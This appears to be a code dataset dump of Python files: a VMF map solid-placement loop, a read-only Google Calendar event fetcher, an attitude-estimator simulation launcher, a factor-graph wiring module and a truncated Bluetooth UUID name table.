if (new_solid_z > solid.origin.z) or (new_solid_z < solid.origin.z-32):
skip = True
if not skip:
new_solid_x = int(solid.origin.x + x)
if new_solid_x % 2 != 0:
new_solid_x = new_solid_x + 1
new_solid_y = int(solid.origin.y + y)
if new_solid_y % 2 != 0:
new_solid_y = new_solid_y + 1
add_success = vmf.add_solid(Vertex(new_solid_x, new_solid_y, new_solid_z), block_xr,
block_yr, block_zr, checkCollisionType=2, material="realworldtextures2/marble/marble_02")
if add_success:
i = i + 1
fail_seq_nr = 0
# contine on new solid
solid = vmf.gen_solid(
Vertex(new_solid_x, new_solid_y, new_solid_z), block_xr, block_yr, block_zr)
else:
fail_seq_nr = fail_seq_nr+1 | 0.393036 | 0.49646 |
import datetime
from typing import Any, Iterable, Iterator
import logging
import googleapiclient.discovery
import google.oauth2.service_account
import model
import config
# If modifying these scopes, delete the file token.json.
_API_SCOPES = ["https://www.googleapis.com/auth/calendar.readonly"]
log = logging.getLogger()
def _get_api_credentials(
scopes: Iterable[str],
) -> google.oauth2.service_account.Credentials:
"""Get the credentials used to Google Oauth
Args:
scopes - A list of the scopes that will be available through
the returned credentials
Returns:
The credentials object used to authenticate
"""
path_to_creds = config.PROJECT_DIR / "secrets/calendar-fetcher-creds.json"
log.debug("Creating API crendetials from file '%s'", path_to_creds)
return google.oauth2.service_account.Credentials.from_service_account_file(
path_to_creds,
scopes=scopes,
)
def _format_as_zulu_date(date: datetime.datetime) -> str:
return f"{date.isoformat()}Z"
def _replace_with_first_day_of_the_year(date: datetime.datetime) -> datetime.datetime:
return date.replace(
month=1,
day=1,
hour=0,
minute=0,
second=0,
microsecond=0,
)
def retrieve_past_year_events() -> Iterator[model.CalendarEvent]:
"""Retrieves the events that have taken place since the start of the current year
Raises:
googleapiclient.errors.HttpError
"""
log.debug("Retrieving past year events")
current_time = datetime.datetime.utcnow()
yield from retrieve_events(
start_date=_replace_with_first_day_of_the_year(current_time),
end_date=current_time,
)
def retrieve_current_year_events() -> Iterator[model.CalendarEvent]:
"""Retrieves all of the current year events
Raises:
googleapiclient.errors.HttpError
"""
log.debug("Retrieving current year events")
current_time = datetime.datetime.utcnow()
yield from retrieve_events(
start_date=_replace_with_first_day_of_the_year(current_time),
end_date=_replace_with_first_day_of_the_year(
current_time.replace(year=current_time.year + 1)
),
)
def retrieve_events(
start_date: datetime.datetime, end_date: datetime.datetime
) -> Iterator[model.CalendarEvent]:
"""Retrieves the events that have taken place between `start_date` and `end_date`
Raises:
googleapiclient.errors.HttpError
"""
log.info("Retrieving events from %s to %s", start_date, end_date)
service = googleapiclient.discovery.build(
"calendar", "v3", credentials=_get_api_credentials(_API_SCOPES)
)
event_dicts: Iterator[dict[str, Any]] = (
service.events()
.list(
calendarId=config.secret_config["calendarId"],
timeMin=_format_as_zulu_date(start_date),
timeMax=_format_as_zulu_date(end_date),
singleEvents=True,
orderBy="startTime",
)
.execute()
.get("items", tuple())
)
return map(model.CalendarEvent.from_dict, event_dicts)
if __name__ == "__main__":
from pprint import pprint
pprint(retrieve_past_year_events()) | src/service.py | import datetime
from typing import Any, Iterable, Iterator
import logging
import googleapiclient.discovery
import google.oauth2.service_account
import model
import config
# If modifying these scopes, delete the file token.json.
_API_SCOPES = ["https://www.googleapis.com/auth/calendar.readonly"]
log = logging.getLogger()
def _get_api_credentials(
scopes: Iterable[str],
) -> google.oauth2.service_account.Credentials:
"""Get the credentials used to Google Oauth
Args:
scopes - A list of the scopes that will be available through
the returned credentials
Returns:
The credentials object used to authenticate
"""
path_to_creds = config.PROJECT_DIR / "secrets/calendar-fetcher-creds.json"
log.debug("Creating API crendetials from file '%s'", path_to_creds)
return google.oauth2.service_account.Credentials.from_service_account_file(
path_to_creds,
scopes=scopes,
)
def _format_as_zulu_date(date: datetime.datetime) -> str:
return f"{date.isoformat()}Z"
def _replace_with_first_day_of_the_year(date: datetime.datetime) -> datetime.datetime:
return date.replace(
month=1,
day=1,
hour=0,
minute=0,
second=0,
microsecond=0,
)
def retrieve_past_year_events() -> Iterator[model.CalendarEvent]:
"""Retrieves the events that have taken place since the start of the current year
Raises:
googleapiclient.errors.HttpError
"""
log.debug("Retrieving past year events")
current_time = datetime.datetime.utcnow()
yield from retrieve_events(
start_date=_replace_with_first_day_of_the_year(current_time),
end_date=current_time,
)
def retrieve_current_year_events() -> Iterator[model.CalendarEvent]:
"""Retrieves all of the current year events
Raises:
googleapiclient.errors.HttpError
"""
log.debug("Retrieving current year events")
current_time = datetime.datetime.utcnow()
yield from retrieve_events(
start_date=_replace_with_first_day_of_the_year(current_time),
end_date=_replace_with_first_day_of_the_year(
current_time.replace(year=current_time.year + 1)
),
)
def retrieve_events(
start_date: datetime.datetime, end_date: datetime.datetime
) -> Iterator[model.CalendarEvent]:
"""Retrieves the events that have taken place between `start_date` and `end_date`
Raises:
googleapiclient.errors.HttpError
"""
log.info("Retrieving events from %s to %s", start_date, end_date)
service = googleapiclient.discovery.build(
"calendar", "v3", credentials=_get_api_credentials(_API_SCOPES)
)
event_dicts: Iterator[dict[str, Any]] = (
service.events()
.list(
calendarId=config.secret_config["calendarId"],
timeMin=_format_as_zulu_date(start_date),
timeMax=_format_as_zulu_date(end_date),
singleEvents=True,
orderBy="startTime",
)
.execute()
.get("items", tuple())
)
return map(model.CalendarEvent.from_dict, event_dicts)
if __name__ == "__main__":
from pprint import pprint
pprint(retrieve_past_year_events()) | 0.658527 | 0.254625 |
import multiprocessing as mp
import numpy as np
from pyecca import replay
from pyecca import uros
from pyecca.estimators.attitude import algorithms
from pyecca.estimators.attitude.estimator import AttitudeEstimator
from pyecca.estimators.attitude.simulator import Simulator
default_params = {
't0': 0,
'tf': 1,
'n_monte_carlo': 1,
'replay_log_file': None,
'name': 'default',
'initialize': True,
'estimators': [],
'x0': [0, 0, 0, 0, 0, 0],
'params': {}
}
eqs = algorithms.eqs()
def init_params(params):
p = dict(default_params)
for k, v in params.items():
if k not in p.keys():
raise KeyError(k)
p[k] = v
return p
def launch_sim(params):
p = init_params(params)
core = uros.Core()
Simulator(core, eqs, p['x0'])
for name in p['estimators']:
AttitudeEstimator(core, name, eqs[name], p['initialize'])
logger = uros.Logger(core)
core.init_params()
for k, v in p['params'].items():
core.set_param(k, v)
core.run(until=p['tf'])
print(p['name'], 'done')
return logger.get_log_as_array()
def launch_monte_carlo_sim(params):
p = init_params(params)
if p['n_monte_carlo'] == 1:
d = dict(p)
d.pop('n_monte_carlo')
data = [launch_sim(d)]
else:
new_params = []
for i in range(p['n_monte_carlo']):
d = dict(p)
d.pop('n_monte_carlo')
d['name'] = i
new_params.append(d)
with mp.Pool(mp.cpu_count()) as pool:
data = np.array(pool.map(launch_sim, new_params))
return data
def launch_replay(params):
p = init_params(params)
core = uros.Core()
replay.ULogReplay(core, p['replay_log_file'])
for name in p['estimators']:
AttitudeEstimator(core, name, eqs[name], p['initialize'])
logger = uros.Logger(core)
core.init_params()
for k, v in p['params'].items():
core.set_param(k, v)
core.run(until=p['tf'])
print(p['name'], 'done')
return logger.get_log_as_array() | pyecca/estimators/attitude/launch.py | import multiprocessing as mp
import numpy as np
from pyecca import replay
from pyecca import uros
from pyecca.estimators.attitude import algorithms
from pyecca.estimators.attitude.estimator import AttitudeEstimator
from pyecca.estimators.attitude.simulator import Simulator
default_params = {
't0': 0,
'tf': 1,
'n_monte_carlo': 1,
'replay_log_file': None,
'name': 'default',
'initialize': True,
'estimators': [],
'x0': [0, 0, 0, 0, 0, 0],
'params': {}
}
eqs = algorithms.eqs()
def init_params(params):
p = dict(default_params)
for k, v in params.items():
if k not in p.keys():
raise KeyError(k)
p[k] = v
return p
def launch_sim(params):
p = init_params(params)
core = uros.Core()
Simulator(core, eqs, p['x0'])
for name in p['estimators']:
AttitudeEstimator(core, name, eqs[name], p['initialize'])
logger = uros.Logger(core)
core.init_params()
for k, v in p['params'].items():
core.set_param(k, v)
core.run(until=p['tf'])
print(p['name'], 'done')
return logger.get_log_as_array()
def launch_monte_carlo_sim(params):
p = init_params(params)
if p['n_monte_carlo'] == 1:
d = dict(p)
d.pop('n_monte_carlo')
data = [launch_sim(d)]
else:
new_params = []
for i in range(p['n_monte_carlo']):
d = dict(p)
d.pop('n_monte_carlo')
d['name'] = i
new_params.append(d)
with mp.Pool(mp.cpu_count()) as pool:
data = np.array(pool.map(launch_sim, new_params))
return data
def launch_replay(params):
p = init_params(params)
core = uros.Core()
replay.ULogReplay(core, p['replay_log_file'])
for name in p['estimators']:
AttitudeEstimator(core, name, eqs[name], p['initialize'])
logger = uros.Logger(core)
core.init_params()
for k, v in p['params'].items():
core.set_param(k, v)
core.run(until=p['tf'])
print(p['name'], 'done')
return logger.get_log_as_array() | 0.422028 | 0.329041 |
from dataclasses import asdict, dataclass
from typing import List, Sequence, Tuple, Union
import jax
import jax.numpy as jnp
import numba as nb
import numpy as np
@jax.tree_util.register_pytree_node_class
@dataclass(frozen=True, eq=False)
class Wiring:
"""Wiring for factors.
Args:
edges_num_states: Array of shape (num_edges,)
Number of states for the variables connected to each edge
var_states_for_edges: Array of shape (num_edge_states,)
Global variable state indices for each edge state
"""
edges_num_states: Union[np.ndarray, jnp.ndarray]
var_states_for_edges: Union[np.ndarray, jnp.ndarray]
def __post_init__(self):
for field in self.__dataclass_fields__:
if isinstance(getattr(self, field), np.ndarray):
getattr(self, field).flags.writeable = False
def tree_flatten(self):
return jax.tree_util.tree_flatten(asdict(self))
@classmethod
def tree_unflatten(cls, aux_data, children):
return cls(**aux_data.unflatten(children))
@dataclass(frozen=True, eq=False)
class Factor:
"""A factor
Args:
variables: List of variables connected by the Factor.
Each variable is represented by a tuple (variable hash, variable num_states)
Raises:
NotImplementedError: If compile_wiring is not implemented
"""
variables: List[Tuple[int, int]]
log_potentials: np.ndarray
def __post_init__(self):
if not hasattr(self, "compile_wiring"):
raise NotImplementedError(
"Please implement compile_wiring in for your factor"
)
@staticmethod
def concatenate_wirings(wirings: Sequence) -> Wiring:
"""Concatenate a list of Wirings
Args:
wirings: A list of Wirings
Returns:
Concatenated Wiring
"""
raise NotImplementedError(
"Please subclass the Wiring class and override this method."
)
@nb.jit(parallel=False, cache=True, fastmath=True, nopython=True)
def _compile_var_states_numba(
var_states_for_edges: np.ndarray,
num_states_cumsum: np.ndarray,
var_states: np.ndarray,
) -> np.ndarray:
"""Fast numba computation of the var_states_for_edges of a Wiring.
var_states_for_edges is updated in-place.
"""
for variable_idx in nb.prange(num_states_cumsum.shape[0] - 1):
start_variable, end_variable = (
num_states_cumsum[variable_idx],
num_states_cumsum[variable_idx + 1],
)
var_states_for_edges[start_variable:end_variable] = var_states[
variable_idx
] + np.arange(end_variable - start_variable) | pgmax/factor/factor.py |
from dataclasses import asdict, dataclass
from typing import List, Sequence, Tuple, Union
import jax
import jax.numpy as jnp
import numba as nb
import numpy as np
@jax.tree_util.register_pytree_node_class
@dataclass(frozen=True, eq=False)
class Wiring:
"""Wiring for factors.
Args:
edges_num_states: Array of shape (num_edges,)
Number of states for the variables connected to each edge
var_states_for_edges: Array of shape (num_edge_states,)
Global variable state indices for each edge state
"""
edges_num_states: Union[np.ndarray, jnp.ndarray]
var_states_for_edges: Union[np.ndarray, jnp.ndarray]
def __post_init__(self):
for field in self.__dataclass_fields__:
if isinstance(getattr(self, field), np.ndarray):
getattr(self, field).flags.writeable = False
def tree_flatten(self):
return jax.tree_util.tree_flatten(asdict(self))
@classmethod
def tree_unflatten(cls, aux_data, children):
return cls(**aux_data.unflatten(children))
@dataclass(frozen=True, eq=False)
class Factor:
"""A factor
Args:
variables: List of variables connected by the Factor.
Each variable is represented by a tuple (variable hash, variable num_states)
Raises:
NotImplementedError: If compile_wiring is not implemented
"""
variables: List[Tuple[int, int]]
log_potentials: np.ndarray
def __post_init__(self):
if not hasattr(self, "compile_wiring"):
raise NotImplementedError(
"Please implement compile_wiring in for your factor"
)
@staticmethod
def concatenate_wirings(wirings: Sequence) -> Wiring:
"""Concatenate a list of Wirings
Args:
wirings: A list of Wirings
Returns:
Concatenated Wiring
"""
raise NotImplementedError(
"Please subclass the Wiring class and override this method."
)
@nb.jit(parallel=False, cache=True, fastmath=True, nopython=True)
def _compile_var_states_numba(
var_states_for_edges: np.ndarray,
num_states_cumsum: np.ndarray,
var_states: np.ndarray,
) -> np.ndarray:
"""Fast numba computation of the var_states_for_edges of a Wiring.
var_states_for_edges is updated in-place.
"""
for variable_idx in nb.prange(num_states_cumsum.shape[0] - 1):
start_variable, end_variable = (
num_states_cumsum[variable_idx],
num_states_cumsum[variable_idx + 1],
)
var_states_for_edges[start_variable:end_variable] = var_states[
variable_idx
] + np.arange(end_variable - start_variable) | 0.929063 | 0.498474 |
uuid16_dict = {
0x0001: "SDP",
0x0003: "RFCOMM",
0x0005: "TCS-BIN",
0x0007: "ATT",
0x0008: "OBEX",
0x000f: "BNEP",
0x0010: "UPNP",
0x0011: "HIDP",
0x0012: "Hardcopy Control Channel",
0x0014: "Hardcopy Data Channel",
0x0016: "Hardcopy Notification",
0x0017: "AVCTP",
0x0019: "AVDTP",
0x001b: "CMTP",
0x001e: "MCAP Control Channel",
0x001f: "MCAP Data Channel",
0x0100: "L2CAP",
# 0x0101 to 0x0fff undefined */
0x1000: "Service Discovery Server Service Class",
0x1001: "Browse Group Descriptor Service Class",
0x1002: "Public Browse Root",
# 0x1003 to 0x1100 undefined */
0x1101: "Serial Port",
0x1102: "LAN Access Using PPP",
0x1103: "Dialup Networking",
0x1104: "IrMC Sync",
0x1105: "OBEX Object Push",
0x1106: "OBEX File Transfer",
0x1107: "IrMC Sync Command",
0x1108: "Headset",
0x1109: "Cordless Telephony",
0x110a: "Audio Source",
0x110b: "Audio Sink",
0x110c: "A/V Remote Control Target",
0x110d: "Advanced Audio Distribution",
0x110e: "A/V Remote Control",
0x110f: "A/V Remote Control Controller",
0x1110: "Intercom",
0x1111: "Fax",
0x1112: "Headset AG",
0x1113: "WAP",
0x1114: "WAP Client",
0x1115: "PANU",
0x1116: "NAP",
0x1117: "GN",
0x1118: "Direct Printing",
0x1119: "Reference Printing",
0x111a: "Basic Imaging Profile",
0x111b: "Imaging Responder",
0x111c: "Imaging Automatic Archive",
0x111d: "Imaging Referenced Objects",
0x111e: "Handsfree",
0x111f: "Handsfree Audio Gateway",
0x1120: "Direct Printing Refrence Objects Service",
0x1121: "Reflected UI",
0x1122: "Basic Printing",
0x1123: "Printing Status",
0x1124: "Human Interface Device Service",
0x1125: "Hardcopy Cable Replacement",
0x1126: "HCR Print",
0x1127: "HCR Scan",
0x1128: "Common ISDN Access",
# 0x1129 and 0x112a undefined */
0x112d: "SIM Access",
0x112e: "Phonebook Access Client",
0x112f: "Phonebook Access Server",
0x1130: "Phonebook Access",
0x1131: "Headset HS",
0x1132: "Message Access Server",
0x1133: "Message Notification Server",
0x1134: "Message Access Profile",
0x1135: "GNSS",
0x1136: "GNSS Server",
0x1137: "3D Display",
0x1138: "3D Glasses",
0x1139: "3D Synchronization",
0x113a: "MPS Profile",
0x113b: "MPS Service",
# 0x113c to 0x11ff undefined */
0x1200: "PnP Information",
0x1201: "Generic Networking",
0x1202: "Generic File Transfer",
0x1203: "Generic Audio",
0x1204: "Generic Telephony",
0x1205: "UPNP Service",
0x1206: "UPNP IP Service",
0x1300: "UPNP IP PAN",
0x1301: "UPNP IP LAP",
0x1302: "UPNP IP L2CAP",
0x1303: "Video Source",
0x1304: "Video Sink",
0x1305: "Video Distribution",
# 0x1306 to 0x13ff undefined */
0x1400: "HDP",
0x1401: "HDP Source",
0x1402: "HDP Sink",
# 0x1403 to 0x17ff undefined */
0x1800: "Generic Access Profile",
0x1801: "Generic Attribute Profile",
0x1802: "Immediate Alert",
0x1803: "Link Loss",
0x1804: "Tx Power",
0x1805: "Current Time Service",
0x1806: "Reference Time Update Service",
0x1807: "Next DST Change Service",
0x1808: "Glucose",
0x1809: "Health Thermometer",
0x180a: "Device Information",
# 0x180b and 0x180c undefined */
0x180d: "Heart Rate",
0x180e: "Phone Alert Status Service",
0x180f: "Battery Service",
0x1810: "Blood Pressure",
0x1811: "Alert Notification Service",
0x1812: "Human Interface Device",
0x1813: "Scan Parameters",
0x1814: "Running Speed and Cadence",
0x1815: "Automation IO",
0x1816: "Cycling Speed and Cadence",
# 0x1817 undefined */
0x1818: "Cycling Power",
0x1819: "Location and Navigation",
0x181a: "Environmental Sensing",
0x181b: "Body Composition",
0x181c: "User Data",
0x181d: "Weight Scale",
0x181e: "Bond Management",
0x181f: "Continuous Glucose Monitoring",
0x1820: "Internet Protocol Support",
0x1821: "Indoor Positioning",
0x1822: "Pulse Oximeter",
0x1823: "HTTP Proxy",
0x1824: "Transport Discovery",
0x1825: "Object Transfer",
0x1826: "Fitness Machine",
0x1827: "Mesh Provisioning",
0x1828: "Mesh Proxy",
# 0x1829 to 0x27ff undefined */
0x2800: "Primary Service",
0x2801: "Secondary Service",
0x2802: "Include",
0x2803: "Characteristic",
# 0x2804 to 0x28ff undefined */
0x2900: "Characteristic Extended Properties",
0x2901: "Characteristic User Description",
0x2902: "Client Characteristic Configuration",
0x2903: "Server Characteristic Configuration",
0x2904: "Characteristic Format",
0x2905: "Characteristic Aggregate Formate",
0x2906: "Valid Range",
0x2907: "External Report Reference",
0x2908: "Report Reference",
0x2909: "Number of Digitals",
0x290a: "Value Trigger Setting",
0x290b: "Environmental Sensing Configuration",
0x290c: "Environmental Sensing Measurement",
0x290d: "Environmental Sensing Trigger Setting",
0x290e: "Time Trigger Setting",
# 0x290f to 0x29ff undefined */
0x2a00: "Device Name",
0x2a01: "Appearance",
0x2a02: "Peripheral Privacy Flag",
0x2a03: "Reconnection Address",
0x2a04: "Peripheral Preferred Connection Parameters",
0x2a05: "Service Changed",
0x2a06: "Alert Level",
0x2a07: "Tx Power Level",
0x2a08: "Date Time",
0x2a09: "Day of Week",
0x2a0a: "Day Date Time",
# 0x2a0b undefined */
0x2a0c: "Exact Time 256",
0x2a0d: "DST Offset",
0x2a0e: "Time Zone",
0x2a0f: "Local Time Information",
# 0x2a10 undefined */
0x2a11: "Time with DST",
0x2a12: "Time Accuracy",
0x2a13: "Time Source",
0x2a14: "Reference Time Information",
# 0x2a15 undefined */
0x2a16: "Time Update Control Point",
0x2a17: "Time Update State",
0x2a18: "Glucose Measurement",
0x2a19: "Battery Level",
# 0x2a1a and 0x2a1b undefined */
0x2a1c: "Temperature Measurement",
0x2a1d: "Temperature Type",
0x2a1e: "Intermediate Temperature",
# 0x2a1f and 0x2a20 undefined */
0x2a21: "Measurement Interval",
0x2a22: "Boot Keyboard Input Report",
0x2a23: "System ID",
0x2a24: "Model Number String",
0x2a25: "Serial Number String",
0x2a26: "Firmware Revision String",
0x2a27: "Hardware Revision String",
0x2a28: "Software Revision String",
0x2a29: "Manufacturer Name String",
0x2a2a: "IEEE 11073-20601 Regulatory Cert. Data List",
0x2a2b: "Current Time",
0x2a2c: "Magnetic Declination",
# 0x2a2d to 0x2a30 undefined */
0x2a31: "Scan Refresh",
0x2a32: "Boot Keyboard Output Report",
0x2a33: "Boot Mouse Input Report",
0x2a34: "Glucose Measurement Context",
0x2a35: "Blood Pressure Measurement",
0x2a36: "Intermediate Cuff Pressure",
0x2a37: "Heart Rate Measurement",
0x2a38: "Body Sensor Location",
0x2a39: "Heart Rate Control Point",
# 0x2a3a to 0x2a3e undefined */
0x2a3f: "Alert Status",
0x2a40: "Ringer Control Point",
0x2a41: "Ringer Setting",
0x2a42: "Alert Category ID Bit Mask",
0x2a43: "Alert Category ID",
0x2a44: "Alert Notification Control Point",
0x2a45: "Unread Alert Status",
0x2a46: "New Alert",
0x2a47: "Supported New Alert Category",
0x2a48: "Supported Unread Alert Category",
0x2a49: "Blood Pressure Feature",
0x2a4a: "HID Information",
0x2a4b: "Report Map",
0x2a4c: "HID Control Point",
0x2a4d: "Report",
0x2a4e: "Protocol Mode",
0x2a4f: "Scan Interval Window",
0x2a50: "PnP ID",
0x2a51: "Glucose Feature",
0x2a52: "Record Access Control Point",
0x2a53: "RSC Measurement",
0x2a54: "RSC Feature",
0x2a55: "SC Control Point",
0x2a56: "Digital",
# 0x2a57 undefined */
0x2a58: "Analog",
# 0x2a59 undefined */
0x2a5a: "Aggregate",
0x2a5b: "CSC Measurement",
0x2a5c: "CSC Feature",
0x2a5d: "Sensor Location",
# 0x2a5e to 0x2a62 undefined */
0x2a63: "Cycling Power Measurement",
0x2a64: "Cycling Power Vector",
0x2a65: "Cycling Power Feature",
0x2a66: "Cycling Power Control Point",
0x2a67: "Location and Speed",
0x2a68: "Navigation",
0x2a69: "Position Quality",
0x2a6a: "LN Feature",
0x2a6b: "LN Control Point",
0x2a6c: "Elevation",
0x2a6d: "Pressure",
0x2a6e: "Temperature",
0x2a6f: "Humidity",
0x2a70: "True Wind Speed",
0x2a71: "True Wind Direction",
0x2a72: "Apparent Wind Speed",
0x2a73: "Apparent Wind Direction",
0x2a74: "Gust Factor",
0x2a75: "Pollen Concentration",
0x2a76: "UV Index",
0x2a77: "Irradiance",
0x2a78: "Rainfall",
0x2a79: "Wind Chill",
0x2a7a: "Heat Index",
0x2a7b: "Dew Point",
0x2a7c: "Trend",
0x2a7d: "Descriptor Value Changed",
0x2a7e: "Aerobic Heart Rate Lower Limit",
0x2a7f: "Aerobic Threshold",
0x2a80: "Age",
0x2a81: "Anaerobic Heart Rate Lower Limit",
0x2a82: "Anaerobic Heart Rate Upper Limit",
0x2a83: "Anaerobic Threshold",
0x2a84: "Aerobic Heart Rate Upper Limit",
0x2a85: "Date of Birth",
0x2a86: "Date of Threshold Assessment",
0x2a87: "Email Address",
0x2a88: "Fat Burn Heart Rate Lower Limit",
0x2a89: "Fat Burn Heart Rate Upper Limit",
0x2a8a: "<NAME>",
0x2a8b: "Five Zone Heart Rate Limits",
0x2a8c: "Gender",
0x2a8d: "Heart Rate Max",
0x2a8e: "Height",
0x2a8f: "Hip Circumference",
0x2a90: "<NAME>",
0x2a91: "Maximum Recommended Heart Rate",
0x2a92: "Resting Heart Rate",
0x2a93: "Sport Type for Aerobic/Anaerobic Thresholds",
0x2a94: "Three Zone Heart Rate Limits",
0x2a95: "Two Zone Heart Rate Limit",
0x2a96: "VO2 Max",
0x2a97: "Waist Circumference",
0x2a98: "Weight",
0x2a99: "Database Change Increment",
0x2a9a: "User Index",
0x2a9b: "Body Composition Feature",
0x2a9c: "Body Composition Measurement",
0x2a9d: "Weight Measurement",
0x2a9e: "Weight Scale Feature",
0x2a9f: "User Control Point",
0x2aa0: "Magnetic Flux Density - 2D",
0x2aa1: "Magnetic Flux Density - 3D",
0x2aa2: "Language",
0x2aa3: "Barometric Pressure Trend",
0x2aa4: "Bond Management Control Point",
0x2aa5: "Bond Management Feature",
0x2aa6: "Central Address Resolution",
0x2aa7: "CGM Measurement",
0x2aa8: "CGM Feature",
0x2aa9: "CGM Status",
0x2aaa: "CGM Session Start Time",
0x2aab: "CGM Session Run Time",
0x2aac: "CGM Specific Ops Control Point",
0x2aad: "Indoor Positioning Configuration",
0x2aae: "Latitude",
0x2aaf: "Longitude",
0x2ab0: "Local North Coordinate",
0x2ab1: "Local East Coordinate",
0x2ab2: "Floor Number",
0x2ab3: "Altitude",
0x2ab4: "Uncertainty",
0x2ab5: "Location Name",
0x2ab6: "URI",
0x2ab7: "HTTP Headers",
0x2ab8: "HTTP Status Code",
0x2ab9: "HTTP Entity Body",
0x2aba: "HTTP Control Point",
0x2abb: "HTTPS Security",
0x2abc: "TDS Control Point",
0x2abd: "OTS Feature",
0x2abe: "Object Name",
0x2abf: "Object Type",
0x2ac0: "Object Size",
0x2ac1: "Object First-Created",
0x2ac2: "Object Last-Modified",
0x2ac3: "Object ID",
0x2ac4: "Object Properties",
0x2ac5: "Object Action Control Point",
0x2ac6: "Object List Control Point",
0x2ac7: "Object List Filter",
0x2ac8: "Object Changed",
0x2ac9: "Resolvable Private Address Only",
# 0x2aca and 0x2acb undefined */
0x2acc: "Fitness Machine Feature",
0x2acd: "Treadmill Data",
0x2ace: "Cross Trainer Data",
0x2acf: "Step Climber Data",
0x2ad0: "Stair Climber Data",
0x2ad1: "Rower Data",
0x2ad2: "Indoor Bike Data",
0x2ad3: "Training Status",
0x2ad4: "Supported Speed Range",
0x2ad5: "Supported Inclination Range",
0x2ad6: "Supported Resistance Level Range",
0x2ad7: "Supported Heart Rate Range",
0x2ad8: "Supported Power Range",
0x2ad9: "Fitness Machine Control Point",
0x2ada: "Fitness Machine Status",
0x2adb: "Mesh Provisioning Data In",
0x2adc: "Mesh Provisioning Data Out",
0x2add: "Mesh Proxy Data In",
0x2ade: "Mesh Proxy Data Out",
# vendor defined */
0xfeff: "GN Netcom",
0xfefe: "GN ReSound A/S",
0xfefd: "Gimbal: Inc.",
0xfefc: "Gimbal: Inc.",
0xfefb: "Stollmann E+V GmbH",
0xfefa: "PayPal: Inc.",
0xfef9: "PayPal: Inc.",
0xfef8: "Aplix Corporation",
0xfef7: "Aplix Corporation",
0xfef6: "Wicentric: Inc.",
0xfef5: "Dialog Semiconductor GmbH",
0xfef4: "Google",
0xfef3: "Google",
0xfef2: "CSR",
0xfef1: "CSR",
0xfef0: "Intel",
0xfeef: "Polar Electro Oy",
0xfeee: "Polar Electro Oy",
0xfeed: "Tile: Inc.",
0xfeec: "Tile: Inc.",
0xfeeb: "Swirl Networks: Inc.",
0xfeea: "Swirl Networks: Inc.",
0xfee9: "Quintic Corp.",
0xfee8: "Quintic Corp.",
0xfee7: "Tencent Holdings Limited",
0xfee6: "Seed Labs: Inc.",
0xfee5: "Nordic Semiconductor ASA",
0xfee4: "Nordic Semiconductor ASA",
0xfee3: "Anki: Inc.",
0xfee2: "Anki: Inc.",
0xfee1: "Anhui Huami Information Technology Co.",
0xfee0: "Anhui Huami Information Technology Co.",
0xfedf: "Design SHIFT",
0xfede: "Coin: Inc.",
0xfedd: "Jawbone",
0xfedc: "Jawbone",
0xfedb: "Perka: Inc.",
0xfeda: "ISSC Technologies Corporation",
0xfed9: "Pebble Technology Corporation",
0xfed8: "Google",
0xfed7: "Broadcom Corporation",
0xfed6: "Broadcom Corporation",
0xfed5: "Plantronics Inc.",
0xfed4: "Apple: Inc.",
0xfed3: "Apple: Inc.",
0xfed2: "Apple: Inc.",
0xfed1: "Apple: Inc.",
0xfed0: "Apple: Inc.",
0xfecf: "Apple: Inc.",
0xfece: "Apple: Inc.",
0xfecd: "Apple: Inc.",
0xfecc: "Apple: Inc.",
0xfecb: "Apple: Inc.",
0xfeca: "Apple: Inc.",
0xfec9: "Apple: Inc.",
0xfec8: "Apple: Inc.",
0xfec7: "Apple: Inc.",
0xfec6: "Kocomojo: LLC",
0xfec5: "Realtek Semiconductor Corp.",
0xfec4: "PLUS Location Systems",
0xfec3: "360fly: Inc.",
0xfec2: "Blue Spark Technologies: Inc.",
0xfec1: "KDDI Corporation",
0xfec0: "KDDI Corporation",
0xfebf: "Nod: Inc.",
0xfebe: "Bose Corporation",
0xfebd: "Clover Network: Inc.",
0xfebc: "Dexcom: Inc.",
0xfebb: "adafruit industries",
0xfeba: "Tencent Holdings Limited",
0xfeb9: "LG Electronics",
0xfeb8: "Facebook: Inc.",
0xfeb7: "Facebook: Inc.",
0xfeb6: "Vencer Co: Ltd",
0xfeb5: "WiSilica Inc.",
0xfeb4: "WiSilica Inc.",
0xfeb3: "Taobao",
0xfeb2: "Microsoft Corporation",
0xfeb1: "Electronics Tomorrow Limited",
0xfeb0: "Nest Labs Inc.",
0xfeaf: "Nest Labs Inc.",
0xfeae: "Nokia Corporation",
0xfead: "Nokia Corporation",
0xfeac: "Nokia Corporation",
0xfeab: "Nokia Corporation",
0xfeaa: "Google",
0xfea9: "Savant Systems LLC",
0xfea8: "Savant Systems LLC",
0xfea7: "UTC Fire and Security",
0xfea6: "GoPro: Inc.",
0xfea5: "GoPro: Inc.",
0xfea4: "Paxton Access Ltd",
0xfea3: "ITT Industries",
0xfea2: "Intrepid Control Systems: Inc.",
0xfea1: "Intrepid Control Systems: Inc.",
0xfea0: "Google",
0xfe9f: "Google",
0xfe9e: "Dialog Semiconductor B.V.",
0xfe9d: "Mobiquity Networks Inc",
0xfe9c: "GSI Laboratories: Inc.",
0xfe9b: "Samsara Networks: Inc",
0xfe9a: "Estimote",
0xfe99: "Currant: Inc.",
0xfe98: "Currant: Inc.",
0xfe97: "Tesla Motor Inc.",
0xfe96: "Tesla Motor Inc.",
0xfe95: "Xiaomi Inc.",
0xfe94: "OttoQ Inc.",
0xfe93: "OttoQ Inc.",
0xfe92: "Jarden Safety & Security",
0xfe91: "Shanghai Imilab Technology Co.,Ltd",
0xfe90: "JUMA",
0xfe8f: "CSR",
0xfe8e: "ARM Ltd",
0xfe8d: "Interaxon Inc.",
0xfe8c: "TRON Forum",
0xfe8b: "Apple: Inc.",
0xfe8a: "Apple: Inc.",
0xfe89: "B&O Play A/S",
0xfe88: "SALTO SYSTEMS S.L.",
0xfe87: "Qingdao Yeelink Information Technology Co.: Ltd. ( 青岛亿联客信息技术有限公司 )",
0xfe86: "HUAWEI Technologies Co.: Ltd. ( 华为技术有限公司 )",
0xfe85: "RF Digital Corp",
0xfe84: "RF Digital Corp",
0xfe83: "Blue Bite",
0xfe82: "Medtronic Inc.",
0xfe81: "Medtronic Inc.",
0xfe80: "Doppler Lab",
0xfe7f: "Doppler Lab",
0xfe7e: "Awear Solutions Ltd",
0xfe7d: "Aterica Health Inc.",
0xfe7c: "Stollmann E+V GmbH",
0xfe7b: "Orion Labs: Inc.",
0xfe7a: "Bragi GmbH",
0xfe79: "Zebra Technologies",
0xfe78: "Hewlett-Packard Company",
0xfe77: "Hewlett-Packard Company",
0xfe76: "TangoMe",
0xfe75: "TangoMe",
0xfe74: "unwire",
